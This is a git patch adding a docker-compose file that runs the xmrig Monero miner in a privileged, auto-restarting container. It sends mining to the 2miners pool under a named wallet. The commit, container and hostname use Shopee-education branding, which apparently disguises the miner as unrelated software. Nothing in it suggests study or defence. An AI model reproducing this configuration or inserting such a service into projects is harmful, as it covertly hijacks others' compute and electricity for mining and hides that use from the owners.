From 77d601d1321a0a75aefd4675b418af02954c5248 Mon Sep 17 00:00:00 2001 From: thebestvibedev Date: Thu, 16 Jul 2026 09:45:47 +0700 Subject: [PATCH] shopee_edu_12month --- docker-compose.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 docker-compose.yaml diff --git a/docker-compose.yaml b/docker-compose.yaml new file mode 100644 index 0000000..0141d73 --- /dev/null +++ b/docker-compose.yaml @@ -0,0 +1,18 @@ +services: + xmrig: + container_name: shoppee_edu_12months + hostname: shoppee.neyako.vip + image: ghcr.io/murf2/xmrig.docker:latest + restart: unless-stopped + privileged: true + environment: + POOL_URL: "xmr.2miners.com:2222" + POOL_USER: "47nJXCrSUPMBgcLGHoGcxifcQLqm6KfNN4C4ktWhNBvehLBRtcuDnQDEzu43WptQd3MW2MpSiD3i2Vnjg44VHKJ5KzLVj26" + POOL_PASS: "worker01" + COIN: "monero" + THREADS: "4" + PRIORITY: "1" + DONATE_LEVEL: "1" + ACCESS_TOKEN: "neyako" + ports: + - "3000:3000" \ No newline at end of file